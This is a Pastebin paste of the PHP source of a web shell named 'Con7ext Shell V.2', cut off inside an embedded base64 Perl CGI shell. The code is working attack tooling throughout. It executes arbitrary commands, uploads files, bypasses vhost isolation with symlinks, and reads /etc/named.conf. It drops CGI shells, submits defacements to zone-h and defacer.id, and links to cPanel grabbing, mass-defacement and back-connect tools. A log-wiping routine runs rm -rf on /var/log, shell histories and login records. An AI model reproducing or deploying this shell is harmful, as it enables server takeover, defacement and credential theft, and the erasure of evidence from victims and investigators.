Guest User

Untitled

a guest
Aug 31st, 2018
143
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 26.91 KB | None | 0 0
  1. <?php
  2. ######################################################
  3. #Title :Con7ext Shell V.2 #
  4. ######################################################
  5. session_start();
  6. set_time_limit(0);
  7. error_reporting(0);
  8. date_default_timezone_set("Asia/Jakarta");
  9. $auth_pass = "96f0f08c0188ba04898ce8cc465c19c4"; // con7extshell
  10. if(get_magic_quotes_gpc()) {
  11. function VEstripslashes($array) {
  12. return is_array($array) ? array_map('VEstripslashes', $array) : stripslashes($array); }
  13. $_POST = VEstripslashes($_POST);
  14. $_COOKIE = VEstripslashes($_COOKIE); }
  15.  
  16.  
  17. function Login() {
  18. die("
  19. <html>
  20. <head>
  21. <title>Login Page</title>
  22. <style type='text/css'>
  23. html {
  24. margin: 20px auto;
  25. background:black;
  26. color: green;
  27. text-align: center;
  28. }
  29. pre {
  30. color: white;
  31. }
  32.  
  33. input[type=password] {
  34. background:transparent;
  35. color:white;
  36. margin:0 10px;
  37. font-family:Homenaje;
  38. font-size:13px;
  39. border:2px solid white;
  40. }
  41.  
  42. </style>
  43. </head>
  44. <center>
  45. <br>
  46. <br>
  47. <header>
  48. <audio autoplay='1' loop='1'><source src='http://con7ext-exeuser.rhcloud.com/music/Re_Zero%20-%20Paradisus-Paradoxum.mp3' type='audio/mp3'/></audio>
  49. <img src='http://con7ext-exeuser.rhcloud.com/images/chaika.png' width='400' height='400' align='center'>
  50. <br>
  51. <br>
  52. <pre align=center><form method='post'><input type='password' name='pass' style='background-color:none;border:1px solid #FFF;outline:none;' required><input type=submit value='submit' style='border:none;background-color:#56AD15;color:#fff;cursor:pointer;'></form></pre>
  53. ");
  54. }
  55.  
  56. function VEsetcookie($k, $v) {
  57. $_COOKIE[$k] = $v;
  58. setcookie($k, $v);
  59. }
  60.  
  61. if(!empty($auth_pass)) {
  62. if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
  63. VEsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);
  64.  
  65. if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
  66. Login();
  67. }
  68. ?>
  69. <!DOCTYPE HTML>
  70. <HTML>
  71. <HEAD>
  72. <link href="" rel="stylesheet" type="text/css">
  73. <title>Con7ext Shell V.2</title>
  74. <meta charset="utf-8">
  75. <meta name="viewport" content="width=device-width, initial-scale=1">
  76. <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
  77. <script src="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js"></script>
  78. <style>
  79. * {
  80. font-family: Electrolize, sans-serif;
  81. }
  82. body {
  83. background-color: black;
  84. background-size: 100%;
  85. background-repeat:no-repeat;
  86. margin: 0px;
  87. font-family: "Electrolize", sans-serif; cursive;color:#fff;
  88. font-size: 13px;
  89. }
  90. hr {
  91. background-color: #b3eeff; height: 3px; border: 0;
  92. }
  93. a {
  94. text-decoration:none; color:#b3eeff; cursor: auto;} a:hover{
  95. border-bottom-width: 1px;
  96. border-bottom-style: solid;
  97. border-bottom-color: #ffffff;
  98. }
  99. tbody {
  100. display: table-row-group;
  101. vertical-align: middle;
  102. border-color: inherit;
  103. }
  104. table {
  105. white-space: normal;
  106. line-height: normal;
  107. font-weight: normal;
  108. font-style: normal;
  109. color: -internal-quirk-inherit;
  110. text-align: start;
  111. font-variant: normal normal;
  112. }
  113. table {
  114. display: table;
  115. border-collapse: separate;
  116. border-spacing: 2px;
  117. border-color: grey;
  118. }
  119. tr {
  120. display: table-row;
  121. vertical-align: inherit;
  122. border-color: inherit;
  123. }
  124. td, th {
  125. display: table-cell;
  126. vertical-align: inherit;
  127. }
  128. #menu a {
  129. font-family:ubuntu_monoregular;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;border:1;
  130. font-size: 12px;
  131. background:#191919;
  132. color:white;
  133. margin:5px 2px 4px 2px;
  134. padding:5px 8px;
  135. border-color: cyan;
  136. text-decoration:none;
  137. letter-spacing:1px;
  138. -moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
  139. }
  140. #menu a:hover {
  141. font-size: 12px;
  142. background:#191919;-webkit-transform:rotate(0.0deg);-moz-transform:rotate(0.0deg);-ms-transform:rotate(0.0deg);-o-transform:rotate(0.0deg);transform:rotate(0.0deg);
  143. color: white;
  144. padding:5px 8px;
  145. margin:1px;
  146. border: 1px;
  147. font-family:ubuntu_monoregular;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;border:1;
  148. letter-spacing:1px;
  149. margin:5px 2px 4px 2px;
  150. -moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
  151. }
  152.  
  153. .content{
  154. width:100%; text-decoration:none; color:#b3eeff;
  155. }
  156. a {
  157. -webkit-transition:all .4s ease-in-out;-moz-transition:all .4s ease-in-out;-o-transition:all .4s ease-in-out;-ms-transition:all .4s ease-in-out;transition:all .4s ease-in-out text-decoration:none;
  158. }
  159. .content a:link {
  160. text-decoration: none;
  161. }
  162. .content a:visited {
  163. }
  164. .content a:hover {
  165. background: #b3eeff; color: black;
  166. }
  167. .content td{
  168. padding:0 8px; line-height:24px;
  169. }
  170. .content th{
  171. background: #191919; padding:3px 8px; font-weight:normal;
  172. }
  173. .content tr:hover{
  174. cursor:pointer;
  175. background-color: #111111;
  176. }
  177. input[type=submit]{
  178. background:#000000;
  179. color:#b3eeff;
  180. margin:0 4px;
  181. font-size:13px;
  182. border:1px solid #444444;
  183. cursor:pointer;
  184. -moz-border-radius: 5px;
  185. -webkit-border-radius: 5px;
  186. -khtml-border-radius: 5px;
  187. }
  188. input[type=submit]:hover{
  189. border-bottom:1px solid #ffffff;
  190. font-size:13px;
  191. border-top:1px solid #ffffff;
  192. }
  193. input[type=text], option, select {
  194. background:#000000;
  195. border:0;
  196. padding:2px;
  197. border-bottom:1px solid #393939;
  198. color:#b3eeff;
  199. }
  200. textarea {
  201. margin:auto;
  202. border:1px solid #333333;
  203. width:100%;
  204. height:400px;
  205. background:#000000;
  206. color:#b3eeff;
  207. padding:0 2px;
  208. font-size:12px;
  209. }
  210. #nav{position:fixed;z-index:999;top:0;width:100%;left:76%;
  211. }
  212. a.nav-fokus {display:block; width:auto; height:auto; background:transparent; border-top:0px; border-left: 1px solid #fff; border-right:1px solid #fff; border-bottom:1px solid #fff; padding:5px 8px; text-align:center; text-decoration:none; color:#b3eeff; line-height:20px; overflow:hidden; float:left;
  213. }
  214. a.nav-fokus:hover {color:#FFFFFF; background:#191919; border-top:0px; border-left: 1px solid #fff; border-right:1px solid #fff; border-bottom:1px solid #fff;
  215. }
  216. </style>
  217. </head>
  218.  
  219. <?php
  220. function w($dir,$perm) {
  221. if(!is_writable($dir)) {
  222. return "<font color=red>".$perm."</font>";
  223. } else {
  224. return "<font color=green>".$perm."</font>";
  225. }
  226. }
  227. function exe($cmd) {
  228. if(function_exists('system')) {
  229. @ob_start();
  230. @system($cmd);
  231. $buff = @ob_get_contents();
  232. @ob_end_clean();
  233. return $buff;
  234. } elseif(function_exists('exec')) {
  235. @exec($cmd,$results);
  236. $buff = "";
  237. foreach($results as $result) {
  238. $buff .= $result;
  239. } return $buff;
  240. } elseif(function_exists('passthru')) {
  241. @ob_start();
  242. @passthru($cmd);
  243. $buff = @ob_get_contents();
  244. @ob_end_clean();
  245. return $buff;
  246. } elseif(function_exists('shell_exec')) {
  247. $buff = @shell_exec($cmd);
  248. return $buff;
  249. }
  250. }
  251. function sulap($text) {
  252. if(!get_magic_quotes_gpc()) {
  253. return $text;
  254. }
  255. return stripslashes($text);
  256. }
  257. function defid($url,$nick,$team) {
  258. $ch = curl_init("https://defacer.id/archives/notify");
  259. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  260. curl_setopt($ch, CURLOPT_POST, true);
  261. curl_setopt($ch, CURLOPT_POSTFIELDS, "attacker=$nick&team=$team&poc=SQL Injection&url=$url");
  262. return curl_exec($ch);
  263. curl_close($ch);
  264. }
  265. function zoneh($url,$nick) {
  266. $ch = curl_init("http://www.zone-h.com/notify/single");
  267. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  268. curl_setopt($ch, CURLOPT_POST, true);
  269. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  270. return curl_exec($ch);
  271. curl_close($ch);
  272. }
  273. function GrabUrl($url,$type){
  274.  
  275. $urlArray = array();
  276.  
  277. $ch = curl_init();
  278. curl_setopt($ch, CURLOPT_URL, $url);
  279. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  280. $result = curl_exec($ch);
  281.  
  282. $regex='|<a.*?href="(.*?)"|';
  283. preg_match_all($regex,$result,$parts);
  284. $links=$parts[1];
  285. foreach($links as $link){
  286. array_push($urlArray, $link);
  287. }
  288. curl_close($ch);
  289.  
  290. foreach($urlArray as $value){
  291. $lol="$url$value";
  292. if(preg_match("#$type#is", $lol)) {
  293. echo "$lol\r\n";
  294. }
  295. }
  296. }
  297. function showdisablefunctions() {
  298. if ($disablefunc=@ini_get("disable_functions")){ return "<span style='color:'><font color=#DD4736><b>".$disablefunc."</b></font></span>"; }
  299. else { return "<span style='color:#00FF1E'><b>NONE</b></span>"; }
  300. }
  301. function ambilKata($param, $kata1, $kata2){
  302. if(strpos($param, $kata1) === FALSE) return FALSE;
  303. if(strpos($param, $kata2) === FALSE) return FALSE;
  304. $start = strpos($param, $kata1) + strlen($kata1);
  305. $end = strpos($param, $kata2, $start);
  306. $return = substr($param, $start, $end - $start);
  307. return $return;
  308. }
  309. function perms($file){
  310. $perms = fileperms($file);
  311. if (($perms & 0xC000) == 0xC000) {
  312. // Socket
  313. $info = 's';
  314. } elseif (($perms & 0xA000) == 0xA000) {
  315. // Symbolic Link
  316. $info = 'l';
  317. } elseif (($perms & 0x8000) == 0x8000) {
  318. // Regular
  319. $info = '-';
  320. } elseif (($perms & 0x6000) == 0x6000) {
  321. // Block special
  322. $info = 'b';
  323. } elseif (($perms & 0x4000) == 0x4000) {
  324. // Directory
  325. $info = 'd';
  326. } elseif (($perms & 0x2000) == 0x2000) {
  327. // Character special
  328. $info = 'c';
  329. } elseif (($perms & 0x1000) == 0x1000) {
  330. // FIFO pipe
  331. $info = 'p';
  332. } else {
  333. // Unknown
  334. $info = 'u';
  335. }
  336.  
  337. // Owner
  338. $info .= (($perms & 0x0100) ? 'r' : '-');
  339. $info .= (($perms & 0x0080) ? 'w' : '-');
  340. $info .= (($perms & 0x0040) ?
  341. (($perms & 0x0800) ? 's' : 'x' ) :
  342. (($perms & 0x0800) ? 'S' : '-'));
  343.  
  344. // Group
  345. $info .= (($perms & 0x0020) ? 'r' : '-');
  346. $info .= (($perms & 0x0010) ? 'w' : '-');
  347. $info .= (($perms & 0x0008) ?
  348. (($perms & 0x0400) ? 's' : 'x' ) :
  349. (($perms & 0x0400) ? 'S' : '-'));
  350.  
  351. // World
  352. $info .= (($perms & 0x0004) ? 'r' : '-');
  353. $info .= (($perms & 0x0002) ? 'w' : '-');
  354. $info .= (($perms & 0x0001) ?
  355. (($perms & 0x0200) ? 't' : 'x' ) :
  356. (($perms & 0x0200) ? 'T' : '-'));
  357.  
  358. return $info;
  359. }
  360. $_c7e = 'WGFpIFN5bmRpY2F0ZQ==';
  361. $sys = php_uname();
  362. $ip = gethostbyname($_SERVER['HTTP_HOST']);
  363. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? '<font>ON</font>' : '<font>OFF</font>';
  364. $getds = @ini_get("disable_functions");
  365. $ds = showdisablefunctions().' <font color=white>on</font> <font color=teal>'.php_sapi_name().'</font>';
  366. $mysql = (function_exists('mysql_connect')) ? "<font color=#6fcb9f>ON</font>" : "<font color=#b3eeff>OFF</font>";
  367. $curl = (function_exists('curl_version')) ? "<font color=#6fcb9f>ON</font>" : "<font color=#b3eeff>OFF</font>";
  368. $wget = (exe('wget --help')) ? "<font color=#6fcb9f>ON</font>" : "<font color=#b3eeff>OFF</font>";
  369. $perl = (exe('perl --help')) ? "<font color=#6fcb9f>ON</font>" : "<font color=#b3eeff>OFF</font>";
  370. $python = (exe('python --help')) ? "<font color=#6fcb9f>ON</font>" : "<font color=#b3eeff>OFF</font>";
  371. if(isset($_GET['path'])){
  372. $path = $_GET['path'];
  373. }else{
  374. $path = getcwd();
  375. }
  376. $path = str_replace('\\','/',$path);
  377. $paths = explode('/',$path);
  378. $home_r = $_SERVER['DOCUMENT_ROOT'];
  379. $_COPY = base64_decode($_c7e);
  380. if(get_magic_quotes_gpc()){
  381. foreach($_POST as $key=>$value){
  382. $_POST[$key] = stripslashes($value);
  383. }
  384. }
  385. if($_POST['upload']) {
  386. if($_POST['tipe_upload'] == 'biasa') {
  387. if(@copy($_FILES['ix_file']['tmp_name'], "$path/".$_FILES['ix_file']['name']."")) {
  388. $act = "<font color=green>Uploaded!</font> at <i><b>$path/".$_FILES['ix_file']['name']."</b></i>";
  389. } else {
  390. $act = "<font color=red>Failed to upload file</font>";
  391. }
  392. } else {
  393. $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
  394. $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
  395. if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
  396. if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
  397. $act = "<font color=green>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
  398. } else {
  399. $act = "<font color=red>Failed to upload file</font>";
  400. }
  401. } else {
  402. $act = "<font color=red>Failed to upload file</font>";
  403. }
  404. }
  405. }
  406. echo "<center>
  407. <form method='post' enctype='multipart/form-data'>
  408. <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($path,"Writeable")." ]
  409. <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
  410. <input type='file' name='ix_file'>
  411. <input type='submit' value='upload' name='upload'>
  412. </form></center>";
  413. echo "<center>".$act."</center>";
  414. echo"
  415. System : <font color=#b3eeff>".php_uname()."</font><br>
  416. Server IP : <font color=#b3eeff>".gethostbyname($_SERVER["HTTP_HOST"])."</font> | Your IP : <font color=#b3eeff>".$_SERVER["REMOTE_ADDR"]."</font><br>
  417. Safe Mode : <font color=#b3eeff>".$sm."</font><br>
  418. Time On Server : <font color=#b3eeff>".date("d M Y h:i:s a")."</font><br>
  419. Disable Functions : <font color=#b3eeff>".$ds."</font><br>
  420. MySQL : ".$mysql." | Perl : ".$perl." | Python : ".$python." | WGET : ".$wget." | CURL : ".$curl."<br>
  421. Mirror : <a href='?path=$path&mirror=zoneh'>Zone-H</a> / <a href='?path=$path&mirror=defid'>DefacerID</a><br>
  422. Telnet : <a href='?path=$path&jancok=cgi'>CGI Perl</a> / <a href='?path=$path&jancok=cgi2'>CGI Perl 2</a> / <a href='?path=$path&jancok=cgipy'>CGI Python</a><br>
  423. Bypass : <a href='?path=$path&amp;bypass=disablefunc'>Disable Functions</a> / <a href='?path=$path&amp;bypass=passwd'>Bypass /etc/passwd</a> / <a href='?path=$path&amp;bypass=vhosts'>Bypass Vhosts</a><br>
  424. Symlink : <a href='?path=$path&symlink=server'>Symlink Server</a> / <a href='?path=$path&symlink=404'>Symlink 404</a> / <a href='?path=$path&symlink=python'>Symlink Python</a><br>
  425. Tools : <a href='?path=$path&jancok=cmd'>Command</a> / <a href='?path=$path&jancok=mass'>Mass</a> / <a href='?path=$path&jancok=adminer'>Adminer</a>
  426. / <a href='?path=$path&jancok=jumping'>Jumping</a> / <a href='?path=$path&jancok=cpanel'>Grab Cpanel</a> / <a href='?path=$path&config=grabber'>Config</a> / <a href='?path=$path&mass=changer'>Mass User Changer</a> / <a href='?path=$path&mass=title'>Mass Title Changer</a>
  427. / <a href='?path=$path&backconnect=tool'>Back Connect</a>";
  428. echo "<div id='nav'>
  429. <a class='nav-fokus' href='?'><b>Home</b></a><a class='nav-fokus' href='?path=$path&delete=logs'><b>Delete Logs</b></a><a class='nav-fokus' href='?path=$path&kill=self'><b>Kill Self</b></a><a class='nav-fokus' href='?path=$path&jancok=logout'><b>Log-Out</b></a></div>";
  430. echo '
  431. <br>
  432. <hr color="#191919">
  433. <br>
  434. <table width="700" align="center">
  435. <tr><td><font color="white">Current Path :</font>';
  436. foreach($paths as $id=>$pat){
  437. if($pat == '' && $id == 0){
  438. $a = true;
  439. echo '<a href="?path=/">/</a>';
  440. continue;
  441. }
  442. if($pat == '') continue;
  443. echo '<a href="?path=';
  444. for($i=0;$i<=$id;$i++){
  445. echo "$paths[$i]";
  446. if($i != $id) echo "/";
  447. }
  448. echo '">'.$pat.'</a>/';
  449. }
  450. echo '</td></tr>';
  451. echo '</table>';
  452. echo '<br><hr color="#191919"><br>';
  453. if($_GET['jancok'] == 'logout') {
  454. echo '<form action="?patch='.$path.'&do=logout" method="post">';
  455. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  456. echo 'Good Bye!!';
  457. } elseif($_GET['con7ext'] == 'domains'){echo "<center><div class='mybox'><p align='center' class='cgx2'>Domains and Users</p>";$d0mains = @file("/etc/named.conf");if(!$d0mains){die("<center>Error : can't read [ /etc/named.conf ]</center>");}echo '<table id="output"><tr bgcolor=#cecece><td>Domains</td><td>users</td></tr>';foreach($d0mains as $d0main){if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);flush();if(strlen(trim($domains[1][0])) > 2){$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));echo "<tr><td><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td><td>".$user['name']."</td></tr>";flush();}}}echo'</div></center>';
  458. } elseif($_GET['delete'] == 'logs') {
  459. echo '<br><center><b><span>Delete Logs ( For Safe )</span></b><center><br>';
  460. echo "<table style='margin: 0 auto;'><tr valign='top'><td align='left'>";
  461. exec("rm -rf /tmp/logs");
  462. exec("rm -rf /root/.ksh_history");
  463. exec("rm -rf /root/.bash_history");
  464. exec("rm -rf /root/.bash_logout");
  465. exec("rm -rf /usr/local/apache/logs");
  466. exec("rm -rf /usr/local/apache/log");
  467. exec("rm -rf /var/apache/logs");
  468. exec("rm -rf /var/apache/log");
  469. exec("rm -rf /var/run/utmp");
  470. exec("rm -rf /var/logs");
  471. exec("rm -rf /var/log");
  472. exec("rm -rf /var/adm");
  473. exec("rm -rf /etc/wtmp");
  474. exec("rm -rf /etc/utmp");
  475. exec("rm -rf $HISTFILE");
  476. exec("rm -rf /var/log/lastlog");
  477. exec("rm -rf /var/log/wtmp");
  478.  
  479. shell_exec("rm -rf /tmp/logs");
  480. shell_exec("rm -rf /root/.ksh_history");
  481. shell_exec("rm -rf /root/.bash_history");
  482. shell_exec("rm -rf /root/.bash_logout");
  483. shell_exec("rm -rf /usr/local/apache/logs");
  484. shell_exec("rm -rf /usr/local/apache/log");
  485. shell_exec("rm -rf /var/apache/logs");
  486. shell_exec("rm -rf /var/apache/log");
  487. shell_exec("rm -rf /var/run/utmp");
  488. shell_exec("rm -rf /var/logs");
  489. shell_exec("rm -rf /var/log");
  490. shell_exec("rm -rf /var/adm");
  491. shell_exec("rm -rf /etc/wtmp");
  492. shell_exec("rm -rf /etc/utmp");
  493. shell_exec("rm -rf $HISTFILE");
  494. shell_exec("rm -rf /var/log/lastlog");
  495. shell_exec("rm -rf /var/log/wtmp");
  496.  
  497. passthru("rm -rf /tmp/logs");
  498. passthru("rm -rf /root/.ksh_history");
  499. passthru("rm -rf /root/.bash_history");
  500. passthru("rm -rf /root/.bash_logout");
  501. passthru("rm -rf /usr/local/apache/logs");
  502. passthru("rm -rf /usr/local/apache/log");
  503. passthru("rm -rf /var/apache/logs");
  504. passthru("rm -rf /var/apache/log");
  505. passthru("rm -rf /var/run/utmp");
  506. passthru("rm -rf /var/logs");
  507. passthru("rm -rf /var/log");
  508. passthru("rm -rf /var/adm");
  509. passthru("rm -rf /etc/wtmp");
  510. passthru("rm -rf /etc/utmp");
  511. passthru("rm -rf $HISTFILE");
  512. passthru("rm -rf /var/log/lastlog");
  513. passthru("rm -rf /var/log/wtmp");
  514.  
  515.  
  516. system("rm -rf /tmp/logs");
  517. sleep(2);
  518. echo'<br>Deleting .../tmp/logs ';
  519. sleep(2);
  520.  
  521. system("rm -rf /root/.bash_history");
  522. sleep(2);
  523. echo'<p>Deleting .../root/.bash_history </p>';
  524.  
  525. system("rm -rf /root/.ksh_history");
  526. sleep(2);
  527. echo'<p>Deleting .../root/.ksh_history </p>';
  528.  
  529. system("rm -rf /root/.bash_logout");
  530. sleep(2);
  531. echo'<p>Deleting .../root/.bash_logout </p>';
  532.  
  533. system("rm -rf /usr/local/apache/logs");
  534. sleep(2);
  535. echo'<p>Deleting .../usr/local/apache/logs </p>';
  536.  
  537. system("rm -rf /usr/local/apache/log");
  538. sleep(2);
  539. echo'<p>Deleting .../usr/local/apache/log </p>';
  540.  
  541. system("rm -rf /var/apache/logs");
  542. sleep(2);
  543. echo'<p>Deleting .../var/apache/logs </p>';
  544.  
  545. system("rm -rf /var/apache/log");
  546. sleep(2);
  547. echo'<p>Deleting .../var/apache/log </p>';
  548.  
  549. system("rm -rf /var/run/utmp");
  550. sleep(2);
  551. echo'<p>Deleting .../var/run/utmp </p>';
  552.  
  553. system("rm -rf /var/logs");
  554. sleep(2);
  555. echo'<p>Deleting .../var/logs </p>';
  556.  
  557. system("rm -rf /var/log");
  558. sleep(2);
  559. echo'<p>Deleting .../var/log </p>';
  560.  
  561. system("rm -rf /var/adm");
  562. sleep(2);
  563. echo'<p>Deleting .../var/adm </p>';
  564.  
  565. system("rm -rf /etc/wtmp");
  566. sleep(2);
  567. echo'<p>Deleting .../etc/wtmp </p>';
  568.  
  569. system("rm -rf /etc/utmp");
  570. sleep(2);
  571. echo'<p>Deleting .../etc/utmp </p>';
  572.  
  573. system("rm -rf $HISTFILE");
  574. sleep(2);
  575. echo'<p>Deleting ...$HISTFILE </p>';
  576.  
  577. system("rm -rf /var/log/lastlog");
  578. sleep(2);
  579. echo'<p>Deleting .../var/log/lastlog </p>';
  580.  
  581. system("rm -rf /var/log/wtmp");
  582. sleep(2);
  583. echo'<p>Deleting .../var/log/wtmp </p>';
  584.  
  585. sleep(4);
  586.  
  587. echo '<br><br><p>Your Traces Has Been Successfully Deleting ...From the Server';
  588. echo"</td></tr></table>";
  589. } elseif($_GET['bypass'] == 'vhosts'){
  590. echo "<form method='POST' action=''>";
  591. echo "<center><br><font size='6'>Bypass Symlink vHost</font><br><br>";
  592. echo "<center><input type='submit' value='Bypass it' name='Colii'></center>";
  593. if (isset($_POST['Colii'])){
  594. mkdir('symvhosts', 0755);
  595. chdir('symvhosts');
  596. system('ln -s / Rintoar.txt');
  597. $fvckem ='T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzDQpEaXJlY3RvcnlJbmRleCBzc3Nzc3MuaHRtDQpBZGRUeXBlIHR4dCAucGhwDQpBZGRIYW5kbGVyIHR4dCAucGhw';
  598. $file = fopen(".htaccess","w+"); $write = fwrite ($file ,base64_decode($fvckem)); $Bok3p = symlink("/","Rintoar.txt");
  599. $rt="<br><a href=symvhosts/Rintoar.txt TARGET='_blank'><font color=#ff0000 size=2 face='Courier New'><b>
  600. Bypassed Successfully</b></font></a>";
  601. echo "<br><br><b>Done.. !</b><br><br>Check link given below for / folder symlink <br>$rt<br>Note: Apabila Forbidden pas buka /var/www/vhosts/Domain.com/ harap tambahkan httpdocs ex:/var/www/vhosts/Domain.com/httpdocs/</center>";} echo "</form>";
  602. } elseif($_GET['jancok'] == 'cgi2') {
  603. $cgi_dir = mkdir('con7ext_cgi', 0755);
  604. chdir('con7ext_cgi');
  605. $file_cgi = "cgi2.con7ext";
  606. $memeg = ".htaccess";
  607. $isi_htcgi = "OPTIONS Indexes Includes ExecCGI FollowSymLinks \n AddType application/x-httpd-cgi .con7ext \n AddHandler cgi-script .con7ext \n AddHandler cgi-script .con7ext";
  608. $htcgi = fopen(".htaccess", "w");
  609. $cgi_script = "IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQojIENvcHlyaWdodCAoQykgMjAwMSBSb2hpdGFiIEJhdHJhDQojIFJlY29kZWQgQnkgQ29uN2V4dA0KIyBUaGFua3MgVG8gOiAweDE5OTkgLSBYYWkgU3luZGljYXRlIFRlYW0gLSBBbmQgWW91DQogDQokV2luTlQgPSAwOw0KJE5UQ21kU2VwID0gIiYiOw0KJFVuaXhDbWRTZXAgPSAiOyI7DQokQ29tbWFuZFRpbWVvdXREdXJhdGlvbiA9IDEwOw0KJFNob3dEeW5hbWljT3V0cHV0ID0gMTsNCiRDbWRTZXAgPSAoJFdpbk5UID8gJE5UQ21kU2VwIDogJFVuaXhDbWRTZXApOw0KJENtZFB3ZCA9ICgkV2luTlQgPyAiY2QiIDogInB3ZCIpOw0KJFBhdGhTZXAgPSAoJFdpbk5UID8gIlxcIiA6ICIvIik7DQokUmVkaXJlY3RvciA9ICgkV2luTlQgPyAiIDI+JjEgMT4mMiIgOiAiIDE+JjEgMj4mMSIpOw0Kc3ViIFJlYWRQYXJzZQ0Kew0KICAgIGxvY2FsICgqaW4pID0gQF8gaWYgQF87DQogICAgbG9jYWwgKCRpLCAkbG9jLCAka2V5LCAkdmFsKTsNCiAgIA0KICAgICRNdWx0aXBhcnRGb3JtRGF0YSA9ICRFTlZ7J0NPTlRFTlRfVFlQRSd9ID1+IC9tdWx0aXBhcnRcL2Zvcm0tZGF0YTsgYm91bmRhcnk9KC4rKSQvOw0KIA0KICAgIGlmKCRFTlZ7J1JFUVVFU1RfTUVUSE9EJ30gZXEgIkdFVCIpDQogICAgew0KICAgICAgICAkaW4gPSAkRU5WeydRVUVSWV9TVFJJTkcnfTsNCiAgICB9DQogICAgZWxzaWYoJEVOVnsnUkVRVUVTVF9NRVRIT0QnfSBlcSAiUE9TVCIpDQogICAgew0KICAgICAgICBiaW5tb2RlKFNURElOKSBpZiAkTXVsdGlwYXJ0Rm9ybURhdGEgJiAkV2luTlQ7DQogICAgICAgIHJlYWQoU1RESU4sICRpbiwgJEVOVnsnQ09OVEVOVF9MRU5HVEgnfSk7DQogICAgfQ0KIA0KICAgICMgaGFuZGxlIGZpbGUgdXBsb2FkIGRhdGENCiAgICBpZigkRU5WeydDT05URU5UX1RZUEUnfSA9fiAvbXVsdGlwYXJ0XC9mb3JtLWRhdGE7IGJvdW5kYXJ5PSguKykkLykNCiAgICB7DQogICAgICAgICRCb3VuZGFyeSA9ICctLScuJDE7ICMgcGxlYXNlIHJlZmVyIHRvIFJGQzE4NjcNCiAgICAgICAgQGxpc3QgPSBzcGxpdCgvJEJvdW5kYXJ5LywgJGluKTsNCiAgICAgICAgJEhlYWRlckJvZHkgPSAkbGlzdFsxXTsNCiAgICAgICAgJEhlYWRlckJvZHkgPX4gL1xyXG5cclxufFxuXG4vOw0KICAgICAgICAkSGVhZGVyID0gJGA7DQogICAgICAgICRCb2R5ID0gJCc7DQogICAgICAgICRCb2R5ID1+IHMvXHJcbiQvLzsgIyB0aGUgbGFzdCBcclxuIHdhcyBwdXQgaW4gYnkgTmV0c2NhcGUNCiAgICAgICAgJGlueydmaWxlZGF0YSd9ID0gJEJvZHk7DQogICAgICAgICRIZWFkZXIgPX4gL2ZpbGVuYW1lPVwiKC4rKVwiLzsNCiAgICAgICAgJGlueydmJ30gPSAkMTsNCiAgICAgICAgJGlueydmJ30gPX4gcy9cIi8vZzsNCiAgICAgICAgJGlueydmJ30gPX4gcy9ccy8vZzsNCiANCiAgICAgICAgIyBwYXJzZSB0cmFpbGVyDQogICAgICAgIGZvcigkaT0yOyAkbGlzdFskaV07ICRpKyspDQogICAgICAgIHsNCiAgICAgICAgICAgICRsaXN0WyRpXSA9fiBzL14uK25hbWU9JC8vOw0KICAgICAgICAgICAgJGxpc3RbJGldID1+IC9cIihcdyspXCIvOw0KICAgICAgICAgICAgJGtleSA9ICQxOw0KICAgICAgICAgICAgJHZhbCA9ICQnOw0KICAgICAgICAgICAgJHZhbCA9fiBzLyheKFxyXG5cclxufFxuXG4pKXwoXHJcbiR8XG4kKS8vZzsNCiAgICAgICAgICAgICR2YWwgPX4gcy8lKC4uKS9wYWNrKCJjIiwgaGV4KCQxKSkvZ2U7DQogICAgICAgICAgICAkaW57JGtleX0gPSAkdmFsOw0KICAgICAgICB9DQogICAgfQ0KICAgIGVsc2UgIyBzdGFuZGFyZCBwb3N0IGRhdGEgKHVybCBlbmNvZGVkLCBub3QgbXVsdGlwYXJ0KQ0KICAgIHsNCiAgICAgICAgQGluID0gc3BsaXQoLyYvLCAkaW4pOw0KICAgICAgICBmb3JlYWNoICRpICgwIC4uICQjaW4pDQogICAgICAgIHsNCiAgICAgICAgICAgICRpblskaV0gPX4gcy9cKy8gL2c7DQogICAgICAgICAgICAoJGtleSwgJHZhbCkgPSBzcGxpdCgvPS8sICRpblskaV0sIDIpOw0KICAgICAgICAgICAgJGtleSA9fiBzLyUoLi4pL3BhY2soImMiLCBoZXgoJDEpKS9nZTsNCiAgICAgICAgICAgICR2YWwgPX4gcy8lKC4uKS9wYWNrKCJjIiwgaGV4KCQxKSkvZ2U7DQogICAgICAgICAgICAkaW57JGtleX0gLj0gIlwwIiBpZiAoZGVmaW5lZCgkaW57JGtleX0pKTsNCiAgICAgICAgICAgICRpbnska2V5fSAuPSAkdmFsOw0KICAgICAgICB9DQogI